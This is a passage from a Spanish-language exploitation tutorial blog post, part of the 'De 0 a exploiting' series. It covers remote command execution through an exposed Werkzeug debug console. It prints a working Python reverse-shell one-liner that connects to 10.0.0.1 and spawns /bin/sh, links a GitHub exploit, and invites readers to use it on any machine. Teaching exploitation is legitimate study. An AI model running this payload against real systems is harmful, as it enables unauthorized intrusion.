&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS599CW79IgnzUEFjcrL4lIsAkSHkFkE13EzTHys2D15geZD-I_PEKBafvyCvLxji5GsH5oORtd7CDDvVCiM5IGTWDOiRwz541hWTEW85BnNmir5fFBJRMTm3BvWJA0M6J8b23O1SQ5WE/s1600/explotado.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;620&quot; data-original-width=&quot;1289&quot; height=&quot;306&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS599CW79IgnzUEFjcrL4lIsAkSHkFkE13EzTHys2D15geZD-I_PEKBafvyCvLxji5GsH5oORtd7CDDvVCiM5IGTWDOiRwz541hWTEW85BnNmir5fFBJRMTm3BvWJA0M6J8b23O1SQ5WE/s640/explotado.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos, hemos explotado la vulnerabilidad en este programa, y hemos conseguido dejar una shell escuchando, a través de netcat nos hemos conectado y hemos podido ejecutar comandos sin problemas.&lt;br /&gt;
Habríamos entonces conseguido explotar una vulnerabilidad remotamente. En caso de que en otro ordenador no haya sido compilado con opciones para aleatoriedad del código (compilar con las opciones de ASLR en gcc), lo más probable es que el salto de jmp esp, se encuentre en el mismo lugar.&lt;br /&gt;
&lt;br /&gt;
Y ahora como prometí traigo un exploit en python el cual puede ser útil:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Debug Shell Command Execution en Server Werkzeug Python&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Werkzeug son una serie de librerías que permiten montar un web server (WSGI), el cual en caso de dejarlo en modo depuración (Debug mode), es capaz de ejecutar comandos python como si de una consola python se tratara.&lt;br /&gt;
Nosotros lo que haremos será enviar un shellcode en python, el cual será una reverse shell, esta reverse shell se ejecutará como un comando python:&lt;br /&gt;
&lt;pre&gt;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&lt;/pre&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp;Ahora montamos el exploit, para ello he creado un repositorio en github con el código: &lt;a href=&quot;https://github.com/Fare9/PyWerkzeug-Debug-Command-Execution&quot; target=&quot;_blank&quot;&gt;https://github.com/Fare9/PyWerkzeug-Debug-Command-Execution&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Vamos a ver el código del servidor, ejecutarlo y finalmente ejecutar el exploit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhws6RD4Yg7KJNwDiekzoXRRGz48p5ElA1_Au3LjyaZQG1g1DWJs4MO63G1xv6HpeeZJVWt-nhK2ke5dFkDqW7BDb_N01y-SKTn3YLUvxX_b8Encyer85bQAthc7o3EkTZcUgRHTj5gE3s/s1600/codigoserver.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;264&quot; data-original-width=&quot;975&quot; height=&quot;172&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhws6RD4Yg7KJNwDiekzoXRRGz48p5ElA1_Au3LjyaZQG1g1DWJs4MO63G1xv6HpeeZJVWt-nhK2ke5dFkDqW7BDb_N01y-SKTn3YLUvxX_b8Encyer85bQAthc7o3EkTZcUgRHTj5gE3s/s640/codigoserver.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos es un servidor muy sencillo, pero puede ser que alguien se dejara el servidor en modo debug. Lo ejecutamos y vemos el servidor:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP3wroIYsCZOnczZ5gyLTaDAGG8iW38vFJvFisJHZd7IKTTxBoaECDLP8fxepbYxCTvk87xsELtJZVrw163TDYNYKOycwyWFolyEtKz_Ay2I26-6XHP51gFN1xUtdkDYOEs2Kbxq5Xfg0/s1600/ejemploweb.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;159&quot; data-original-width=&quot;484&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP3wroIYsCZOnczZ5gyLTaDAGG8iW38vFJvFisJHZd7IKTTxBoaECDLP8fxepbYxCTvk87xsELtJZVrw163TDYNYKOycwyWFolyEtKz_Ay2I26-6XHP51gFN1xUtdkDYOEs2Kbxq5Xfg0/s640/ejemploweb.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Y como no, tenemos la consola web:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZzcToELDI6te5EsKeI8W1vmUGGD76LKwUtIgQ02orEhM2f1X9xeqKyxoMP_8BqrjtGQ_9RFIs4mqp7RZhGkkhH-UeT8rETlObdCuFypHEx_Q4bYrmz_fVyx61qs8M6UQfY2fYBBmbMo/s1600/consolaweb.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;301&quot; data-original-width=&quot;1292&quot; height=&quot;148&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZzcToELDI6te5EsKeI8W1vmUGGD76LKwUtIgQ02orEhM2f1X9xeqKyxoMP_8BqrjtGQ_9RFIs4mqp7RZhGkkhH-UeT8rETlObdCuFypHEx_Q4bYrmz_fVyx61qs8M6UQfY2fYBBmbMo/s640/consolaweb.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhinfpSJWy14Ybsh4LfJSsZK-lL54SwyJNoMnoKDt0Ir76p0yM3RbYyQ89ipJuOc3XDOTJMZglG4HzJVPD9Qp3qB6DTJiJAj8CLwPP_lKcW3kDyxWkij2AF1gGb_MaxwmUtALx8YGAxomo/s1600/ejemplo_mensaje.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;326&quot; data-original-width=&quot;794&quot; height=&quot;262&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhinfpSJWy14Ybsh4LfJSsZK-lL54SwyJNoMnoKDt0Ir76p0yM3RbYyQ89ipJuOc3XDOTJMZglG4HzJVPD9Qp3qB6DTJiJAj8CLwPP_lKcW3kDyxWkij2AF1gGb_MaxwmUtALx8YGAxomo/s640/ejemplo_mensaje.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bien, vemos que se puede ejecutar comandos de python. Vamos entonces a montar el netcat y ejecutar el exploit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtGTSoAYtCXZ_gcXgLOz4oizHgGQ3r2eQDWRF_YOWH6877IQzhj-MWrNGgmHiRdbiablcXfIASr3yFPk-jkuW1xff9Le75cn5p_Xrahth5DruU_oSlkNQnTtlnZ8eZk7dW74ahJHjmLc/s1600/netcat.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;128&quot; data-original-width=&quot;974&quot; height=&quot;84&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtGTSoAYtCXZ_gcXgLOz4oizHgGQ3r2eQDWRF_YOWH6877IQzhj-MWrNGgmHiRdbiablcXfIASr3yFPk-jkuW1xff9Le75cn5p_Xrahth5DruU_oSlkNQnTtlnZ8eZk7dW74ahJHjmLc/s640/netcat.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4v6IkWaxGPm1mxgsY3MU9Hy5romsKr3WyA2U0-mDdIfTf9KLVw2GFCvYGBbUn_qKOqAsNzSlqcQ64RmREyX7u_HYMyuDz_tk2HiMN9tKKJJn_-iNG1QsEFQheM9peZrwPgjfdeX26IEw/s1600/preexploit.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;162&quot; data-original-width=&quot;974&quot; height=&quot;106&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4v6IkWaxGPm1mxgsY3MU9Hy5romsKr3WyA2U0-mDdIfTf9KLVw2GFCvYGBbUn_qKOqAsNzSlqcQ64RmREyX7u_HYMyuDz_tk2HiMN9tKKJJn_-iNG1QsEFQheM9peZrwPgjfdeX26IEw/s640/preexploit.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Apretamos ENTER y a ver que pasa...&lt;br /&gt;
Lo primero que veremos es que, el exploit parecerá no hacer nada, pues se queda atascado ya que el server no responde se queda &quot;parado&quot;, pero si volvemos al netcat:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ6VEtzqoNm-pxE9zOVRSFUR5_TCQtyLuEsCcG-Rpa-hSfIUyfWrNw9AtbcLmKQrcnKA_hOjW80I15wx3ZstebrSe5ehoMegAMmB7vv5DTNwUHcVsy-XSu367nUbRKY4UgSMlY7-ikQ0/s1600/shell.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;250&quot; data-original-width=&quot;981&quot; height=&quot;162&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ6VEtzqoNm-pxE9zOVRSFUR5_TCQtyLuEsCcG-Rpa-hSfIUyfWrNw9AtbcLmKQrcnKA_hOjW80I15wx3ZstebrSe5ehoMegAMmB7vv5DTNwUHcVsy-XSu367nUbRKY4UgSMlY7-ikQ0/s640/shell.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Como vemos, aprovechando un error humano, hemos podido obtener una shell, tenéis el exploit en github por si, podéis aprovecharlo en cualquier tipo de máquina...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Y hasta aquí el post de &quot;De 0 a exploiting&quot;, os he enseñado como aprovechar cosillas como el integer overflow, fallos en programas remotos y finalmente un exploit &quot;semi&quot; real para una vulnerabilidad conocida.&lt;br /&gt;
&lt;br /&gt;
Como os dije, recordad que estoy por twitter, y se van acercando las fechas de un evento que intentaré dar el curso de &quot;De 0 a exploiting&quot; presencial en forma de taller, iré dando más detalles.&lt;br /&gt;
&lt;br /&gt;
Muchas gracias a todos y hasta la próxima, esta vez vendré con un pequeño post sobre un libro que me ha entretenido mucho leer esta semanilla.</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/8694569513334219169/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/06/de-0-exploiting-x.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/8694569513334219169'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/8694569513334219169'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/06/de-0-exploiting-x.html' title='De 0 a exploiting (X)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkErgVWcbQcZ4TgY5aN1MF5U_AbXr2ZbTc5woyJswvm1nS01UR335zM53T018eCbKiGuJOFs3wr7VKQf7tFFQUWHn0N5tG3pjJ4SYB0EEqLgvlKGA21-IQw1msd729mriKMPMXvHl9KWs/s72-c/13202760.jpg" height="72" width="72"/><thr:total>0</thr:total></entry></feed>